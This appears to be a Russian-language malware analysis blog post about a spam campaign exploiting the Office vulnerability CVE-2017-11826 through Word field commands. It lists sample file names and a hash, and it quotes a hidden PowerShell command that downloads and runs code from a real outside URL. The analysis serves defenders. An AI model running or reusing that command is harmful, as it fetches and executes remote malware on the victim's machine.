10 октября исследователи из китайской компании Qihoo 360 опубликовали статью, в которой предупреждают об эксплойте нулевого дня (CVE-2017-11826), который влияет на Office и который уже активно используется хакерами.
За последние несколько часов мы обнаружили спамовую кампанию, которая нацелена на компании и использует данный эксплойт. Это очень опасная атака, т.к. команды выполняются в Word без каких-либо OLE-объектов или макросов. Все клиенты Panda Security проактивно защищены, и обновление не требуется благодаря Adaptive Defense 360.
Поведение
Письмо приходит с вложенным документом. При открытии документа Word, первое, что мы видим, - это следующее сообщение:
Если нажать на кнопку “Yes”, появится следующее сообщение:
Затем появляется следующее сообщение:
Документ (образец 0910541C2AC975A49A28D7A939E48CD3) содержит две страницы. Первая страниц пустая, а вторая содержит всего лишь короткую фразу на русском языке: “Ошибка! Раздел не указан.”
Если мы нажмем правой кнопкой мыши на тексте, то мы можем увидеть, что с ним связано соответствующее поле:
Если нажать на “Edit field”, мы найдем команду, используемую для эксплуатации уязвимости и разрешения на выполнение кода:
Ниже – скриншот дерева процесса, которое генерируется при корректном выполнении эксплойта:
Exploit CVE-2017-11826 – Загрузка и выполнение вредоносной программы из документа Word
Вот некоторые файлы, используемые в этой кампании:
I_215854.doc
I_563435.doc
I_847923.doc
I_949842.doc
I_516947.doc
I_505075.doc
I_875517.doc
DC0005845.doc
DC000034.doc
DC000873.doc
I_958223.doc
I_224600.doc
I_510287.doc
I_959819.doc
I_615989.doc
I_839063.doc
I_141519.doc
Команды для выполнения
В зависимости от того, какой образец анализируется, мы можем увидеть изменения в URL для скачивания, несмотря на то, что команда, по сути дела, остается одинаковой. Образец 0910541C2AC975A49A28D7A939E48CD3 powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://arkberg-design.fi/KJHDhbje71’)~powershell -e $e
Обращаем внимание, что все материалы в этом блоге представляют личное мнение их авторов. Редакция SecurityLab.ru не несет ответственности за точность, полноту и достоверность опубликованных данных. Вся информация предоставлена «как есть» и может не соответствовать официальной позиции компании.
Твой код — безопасный?
Расскажи, что знаешь о DevSecOps.
Пройди опрос и получи свежий отчет State of DevOps Russia 2025.